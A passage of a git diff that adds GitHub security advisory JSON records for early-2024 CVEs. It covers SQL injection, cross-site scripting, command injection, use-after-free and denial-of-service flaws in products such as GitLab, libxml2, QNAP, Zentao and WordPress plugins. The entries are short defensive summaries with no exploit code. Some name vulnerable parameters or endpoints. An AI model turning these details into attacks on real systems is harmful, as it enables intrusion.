"2024-02-02T00:31:25Z", + "aliases": [ + "CVE-2023-4472" + ], + "details": "Objectplanet Opinio version 7.22 and prior uses a cryptographically weak pseudo-random number generator (PRNG) coupled to a predictable seed, which could lead to an unauthenticated account takeover of any user on the application.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4472" + }, + { + "type": "WEB", + "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2024/MNDT-2024-0002.md" + }, + { + "type": "WEB", + "url": "https://www.objectplanet.com/opinio/changelog.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-335" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json new file mode 100644 index 0000000000000..3d75f180cfc60 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x74g-xc7p-4fx7", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2023-6564" + ], + "details": "An issue has been discovered in GitLab EE Premium and Ultimate affecting versions 16.4.3, 16.5.3, and 16.6.1. In projects using subgroups to define who can push and/or merge to protected branches, there may have been instances in which subgroup members with the Developer role were able to push or merge to protected branches.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6564" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-com/gl-infra/production/-/issues/17213" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json b/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json new file mode 100644 index 0000000000000..4927cdf5ee0e4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x77r-6xxm-wjmx", + "modified": "2024-02-04T18:30:19Z", + "published": "2024-02-04T18:30:19Z", + "aliases": [ + "CVE-2024-25062" + ], + "details": "An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25062" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/tags" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json b/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json new file mode 100644 index 0000000000000..b7fd20ee0eb30 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x848-fc4r-xcw9", + "modified": "2024-02-03T09:30:18Z", + "published": "2024-02-03T09:30:18Z", + "aliases": [ + "CVE-2024-1064" + ], + "details": "A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1064" + }, + { + "type": "WEB", + "url": "https://gitlab.com/crafty-controller/crafty-4/-/issues/327" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-644" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T09:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json b/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json new file mode 100644 index 0000000000000..0b14f18d41bff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x96x-gwv6-4324", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2023-39297" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39297" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-30" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json b/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json new file mode 100644 index 0000000000000..9d8777a7dc5be --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xc8c-3cmg-p9qr", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2024-25140" + ], + "details": "A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is \"we do not have EV cert, so we use test cert as a workaround.\" Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25140" + }, + { + "type": "WEB", + "url": "https://github.com/rustdesk/rustdesk/discussions/6444" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=39256493" + }, + { + "type": "WEB", + "url": "https://serverfault.com/questions/837994" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json new file mode 100644 index 0000000000000..438a17953f945 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xc99-434w-j882", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-49610" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\nMachineSense FeverWarn Raspberry Pi-based devices lack input sanitization, which could allow an attacker on an adjacent network to send a message running commands or could overflow the stack.\n\n\n\n\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49610" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json new file mode 100644 index 0000000000000..0866f87c38729 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcg4-rx98-2f6x", + "modified": "2024-02-07T03:30:32Z", + "published": "2024-02-07T03:30:32Z", + "aliases": [ + "CVE-2024-24019" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/roleDataPerm/list", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24019" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24019.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json b/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json new file mode 100644 index 0000000000000..91a174d916e56 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcpx-h22f-m42v", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2024-20290" + ], + "details": "A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.\n\n This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources.\n\n For a description of this vulnerability, see the ClamAV blog .", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20290" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-hDffu6t" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json b/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json new file mode 100644 index 0000000000000..67b613c245e92 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf6f-94pc-55vc", + "modified": "2024-02-08T06:30:24Z", + "published": "2024-02-08T06:30:24Z", + "aliases": [ + "CVE-2024-24216" + ], + "details": "Zentao v18.0 to v18.10 was discovered to contain a remote code execution (RCE) vulnerability via the checkConnection method of /app/zentao/module/repo/model.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24216" + }, + { + "type": "WEB", + "url": "https://github.com/easysoft/zentaopms/issues/133" + }, + { + "type": "WEB", + "url": "https://github.com/l3s10n/ZenTaoPMS_RCE" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T06:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json b/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json new file mode 100644 index 0000000000000..2a143bfa042e0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf9p-vpmr-grq4", + "modified": "2024-02-04T03:30:23Z", + "published": "2024-02-04T03:30:23Z", + "aliases": [ + "CVE-2023-33851" + ], + "details": "IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could reveal sensitive partition data to a system administrator. IBM X-Force ID: 257135.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33851" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/257135" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114491" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T01:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json b/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json new file mode 100644 index 0000000000000..d287a47f10de3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp6q-36fr-27p3", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6807" + ], + "details": "The GeneratePress Premium plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom meta output in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6807" + }, + { + "type": "WEB", + "url": "https://generatepress.com/category/changelog/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json b/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json new file mode 100644 index 0000000000000..e197bfa0fc2f8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp9v-mj73-x58r", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43519" + ], + "details": "Memory corruption in video while parsing the Videoinfo, when the size of atom is greater than the videoinfo size.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43519" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json b/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json new file mode 100644 index 0000000000000..7b84ba3dbf815 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpmf-hwm7-p279", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-25190" + ], + "details": "l8w8jwt 2.2.1 uses memcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25190" + }, + { + "type": "WEB", + "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/GlitchedPolygons%3Al8w8jwt.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json b/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json new file mode 100644 index 0000000000000..98c8f68f8e11f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpmp-64jj-f5gg", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-46045" + ], + "details": "Graphviz 2.36 before 10.0.0 has an out-of-bounds read via a crafted config6a file. NOTE: exploitability may be uncommon because this file is typically owned by root.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46045" + }, + { + "type": "WEB", + "url": "https://gitlab.com/graphviz/graphviz/-/issues/2441" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/73" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/02/01/2" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json b/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json new file mode 100644 index 0000000000000..418afba5ed357 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq9r-2r42-w9c6", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51689" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in naa986 Easy Video Player allows Stored XSS.This issue affects Easy Video Player: from n/a through 1.2.2.10.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51689" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/easy-video-player/wordpress-easy-video-player-plugin-1-2-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json new file mode 100644 index 0000000000000..225b0c8fe324c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqc9-88mp-rfhw", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22241" + ], + "details": "Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges can inject a malicious payload into the login banner and takeover the user account.   ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22241" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json b/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json new file mode 100644 index 0000000000000..5199b46d9baa8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrq6-qp2x-fh89", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0630" + ], + "details": "The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0630" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json b/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json new file mode 100644 index 0000000000000..bc1adeabae263 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xvvv-2v53-5hxv", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43522" + ], + "details": "Transient DOS while key unwrapping process, when the given encrypted key is empty or NULL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43522" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json b/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json new file mode 100644 index 0000000000000..98b67dc3d8b14 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw3g-x45j-xxhh", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-6536" + ], + "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6536" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6536" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json b/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json new file mode 100644 index 0000000000000..30014325b1629 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": 